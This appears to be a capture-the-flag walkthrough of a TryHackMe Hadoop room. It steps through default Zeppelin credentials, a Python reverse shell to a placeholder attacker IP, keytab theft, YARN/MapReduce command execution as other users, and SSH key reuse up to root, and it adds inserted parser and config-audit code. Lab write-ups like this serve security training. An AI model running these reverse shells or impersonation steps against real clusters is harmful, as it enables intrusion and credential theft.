HACKING HADOOP TryHackMe

LINK TO THE ROOM : https://tryhackme.com/room/hackinghadoop

Download VPN file

Start the machine, run your regular OpenVPN file, then run the VPN file you just downloaded from here while keeping the regular OpenVPN connection running in the background.

and run the command:

Now we can check that everything is set up by doing:

Let’s get to the questions now:

TASK 2 : Understanding the datalake

Which node is responsible for actively keeping the directory tree structure of the datalake?

What type of node provides applications for users?

What Hadoop service is responsible for scheduling jobs?

What Hadoop service provides granular access control to resources?

What is the term provided to a datalake that makes use of Kerberos for security?

Who owns the largest Hadoop cluster in the world?

TASK 3 : All aboard the Hindenburg

I scanned the host 172.23.0.3 by doing:

What edge node service is running on this host?

What file is responsible for the authentication configuration for this service?

hint: Since Apache Zeppelin is open source, google Apache Zeppelin Authentication, this will point you in the right direction.

What is the username and password combination that gives you your initial entry?

I tried admin, but it was not active, as the hint says; then user1 worked.

Let's sign in with these creds by going to http://172.23.0.3:8080.

Once authenticated, submit the flag that is hiding nicely in one of the notebooks.

flag in the NOTEBOOKS

After signing in we can go to TESTNODE and see the flag right there.
PS: don't rush for the revshell, take the flag from here first 🥸.

TASK 4 : Rocking It Like Led

What is the password of the user allowed to interface with the interpreters and provided notebook?

In the same notebook from Task 3, if you scroll down you can find this.

Which active interpreter can be used to execute code?

Now that we have the username and password, let's horizontally escalate our privileges: create a new note and input our reverse shell code.
Now all that is left is to hit Run.

CODE:

import socket, os, pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<attacker IP>", <port>))   # fill in your listener's IP and port
os.dup2(s.fileno(), 0)                 # point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/sh")

Noice, we have a reverse shell on the system. Let's answer some questions then.

What OS user does the application run as?

What is the value of the flag found in the user’s home directory (flag2.txt)?

flag2.txt

TASK 5 : Keeping tabs on all these keys

After reading the task I found out that finding the keytabs is the necessary and most important thing to do right now, so I ran a find command to locate the keytab files on the host.

Which directory stores the keytabs for the Hadoop services?

What is the keytab file’s name associated with the compromised user?

What is the first principal stored in this keytab file?

What is the full verbose command to authenticate with this keytab using the full file path?

flag3.txt

What is the value of the flag stored in the compromised user’s HDFS home directory (flag3.txt)?
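Task 5 asks which principal is stored first in the compromised user's keytab. As an added example that is not part of this writeup, here is a small parser for the MIT keytab format (version 0x0502) that lists each entry's principal, kvno and enctype; the sample keytab is constructed inline with fake keys, and the principal names and realm are placeholders.

```python
import struct

def _counted(b: bytes) -> bytes:
    return struct.pack(">H", len(b)) + b

def build_entry(principal: str, enctype: int, key: bytes, kvno: int = 1) -> bytes:
    """Serialise one keytab entry; used only to build the constructed sample below."""
    name, realm = principal.rsplit("@", 1)
    comps = name.split("/")
    body = struct.pack(">H", len(comps)) + _counted(realm.encode())
    body += b"".join(_counted(c.encode()) for c in comps)
    body += struct.pack(">IIB", 1, 0, kvno & 0xFF)  # name type, timestamp, vno8
    body += struct.pack(">HH", enctype, len(key)) + key
    return struct.pack(">i", len(body)) + body

def list_principals(data: bytes) -> list:
    """Walk every live entry and return (principal, kvno, enctype) in file order."""
    if data[:2] != b"\x05\x02":
        raise ValueError("not a version-2 MIT keytab")
    out, off = [], 2
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:              # negative size marks a deleted slot: skip it
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        strings = []
        for _ in range(ncomp + 1):            # realm first, then each component
            (n,) = struct.unpack_from(">H", data, off)
            strings.append(data[off + 2:off + 2 + n].decode())
            off += 2 + n
        _nt, _ts, kvno = struct.unpack_from(">IIB", data, off)
        off += 9
        enctype, klen = struct.unpack_from(">HH", data, off)
        off += 4 + klen
        if end - off >= 4:        # optional 32-bit kvno overrides the 8-bit one
            (kvno,) = struct.unpack_from(">I", data, off)
        out.append(("/".join(strings[1:]) + "@" + strings[0], kvno, enctype))
        off = end
    return out

# Constructed sample: two entries with fake keys; not data from the room.
SAMPLE_KEYTAB = (b"\x05\x02"
                 + build_entry("user1/edge.example.com@EXAMPLE.COM", 18, b"\x11" * 32, kvno=2)
                 + build_entry("nm/edge.example.com@EXAMPLE.COM", 17, b"\x22" * 16))
```

On a real host the same listing comes from klist -kt <file>; from a defender's side, the point of the task is that these files were readable by the compromised OS user at all.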

TASK 6 : A great big ball of Yarn

I used touchz to create a file in /tmp.

What is the name of the service we will attempt to impersonate for privilege escalation?

To move ahead I had to look at option 5 of the GitHub link given in the task, on how to run remote commands.

What is the value of the flag in the impersonated user’s HDFS home directory (flag4.txt)?

flag4.txt
  • -input <a non empty file on HDFS>: this will be provided as input to MapReduce for the command to be executed, just put at least a character in that file, this file is useless for our objective
  • -output <a nonexistent directory on HDFS>: this directory will be used by MapReduce to write the result, either _SUCCESS or failure
  • -mapper <your single command>: the command to execute, for instance "/bin/cat /etc/passwd". The output result will be written in the -output directory
  • -reducer NONE: there is no need for a reducer to execute a single command, a mapper is enough

This is the command I used to read /etc/passwd; with a few changes it reads the flag file, which we are not otherwise permitted to read.
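The -mapper option above turns a MapReduce job into a remote command, and that command runs as whatever OS account the NodeManager launches containers under. As an added defender-side check, not part of this writeup or the room's files, the script below parses a yarn-site.xml and flags the DefaultContainerExecutor (which never switches users) next to the LinuxContainerExecutor setting that does; both config fragments are constructed.

```python
import xml.etree.ElementTree as ET

EXECUTOR_KEY = "yarn.nodemanager.container-executor.class"
DEFAULT_EXECUTOR = "org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor"
LINUX_EXECUTOR = "org.apache.hadoop.yarn.server.nodemanager.LinuxContainerExecutor"
LCE_GROUP_KEY = "yarn.nodemanager.linux-container-executor.group"

def load_props(xml_text: str) -> dict:
    """Flatten a Hadoop-style <configuration> document into {name: value}."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props

def audit_container_executor(props: dict) -> list:
    """Return findings about which OS account YARN containers execute under."""
    # yarn-default.xml falls back to DefaultContainerExecutor when the key is absent
    executor = props.get(EXECUTOR_KEY, DEFAULT_EXECUTOR)
    findings = []
    if executor == DEFAULT_EXECUTOR:
        findings.append("DefaultContainerExecutor: containers run as the NodeManager's own "
                        "OS user, so any job's -mapper command runs as that service account")
    elif executor == LINUX_EXECUTOR:
        if not props.get(LCE_GROUP_KEY):
            findings.append(LCE_GROUP_KEY + " is unset; LinuxContainerExecutor requires it")
    else:
        findings.append("unrecognised executor class: " + executor)
    return findings

# Constructed yarn-site.xml fragments (not the room's files): weak and hardened.
WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.nodemanager.aux-services</name><value>mapreduce_shuffle</value></property>
  <property><name>yarn.nodemanager.container-executor.class</name>
    <value>org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor</value></property>
</configuration>"""

HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.nodemanager.container-executor.class</name>
    <value>org.apache.hadoop.yarn.server.nodemanager.LinuxContainerExecutor</value></property>
  <property><name>yarn.nodemanager.linux-container-executor.group</name><value>hadoop</value></property>
</configuration>"""
```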

What is the value of the flag in the impersonated user’s OS home directory (flag5.txt)?

flag5.txt

TASK 7 : Assistant to the regional Node

What is the value of the flag associated with the NodeManager’s HDFS home directory (flag6.txt)?

Let's get the keytab of the nm user to get the next flag.

To get the flag, follow these commands step by step.

If you get an error like "this directory /tmp/webby2 already exists", just change the name from webby2 to something like webby3 or webby4, anything other than webby2. Hope you got it!

flag6.txt

What is the value of the flag associated with the NodeManager’s OS home directory (flag7.txt)?

— — — — — — — — — — — — — — — — — — — —

I tried to get SSH access to make my misery a little less painful but wasn't able to get in; after getting the id_rsa key 🥸 I was still unable to log in.

Then I had to change my approach a little.

— — — — — — — — — — — — — — — — — — — — —

Follow these commands as they are and you should get your next flag.

flag7.txt

TASK 8 : I ♥ root

What is the value of the flag in the root user’s home directory (flag8.txt)?

flag8.txt

PS: this flag was soo trueeeee!!!!!!!

What is the value of the flag in the root user’s HDFS home directory (flag9.txt)?

flag9.txt

TASK 10 : Surfing the datalake

What is the value of the flag in the root user’s directory on the secondary cluster node (flag10.txt)?

The id_rsa key I found earlier turned out to be the id_rsa key for 172.23.0.4, so I used it and logged in easily. And the flag was waiting right there for me.

{Thanks Nguyen Van Tien from DISC for helping with this part, coz I couldn't have guessed on my own that this is the SSH key for 172.23.0.4 😅}

flag10.txt

AND FINALLY THE ROOM IS COMPLETED!! 🎉🥳

Special thanks to am03bam4n for making this soul-sucking room, guiding me through it, and not letting me go insane haha.

HAPPY HACKING 🥳🥳🥳🎉🎉

linktree: https://linktr.ee/RishabhRai
